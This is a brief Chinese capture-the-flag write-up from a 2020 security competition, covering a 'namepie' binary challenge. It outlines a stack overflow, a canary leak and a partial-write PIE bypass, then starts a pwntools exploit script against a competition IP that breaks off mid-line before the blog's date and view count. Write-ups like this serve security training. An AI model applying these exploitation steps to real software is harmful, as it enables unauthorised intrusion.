2020 西普杯 信息安全铁人三项 第四赛区 Writeup
namepie
基本情况
程序有后门:
漏洞
第二次输入栈溢出
思路
pie 保护 partly write 绕过。
第一次输入泄露 canary ,第二次覆盖 rip
EXP
from pwn import *
context(log_level='debug')
# p = process("./namepie")
p = remote("172.20.14.168",9999)
elf = ELF("./namepie")
p.recvuntil(":\n")
name = 'skye'.lj
原创
2020-11-09 08:50:59 ·
3738 阅读 ·
8 评论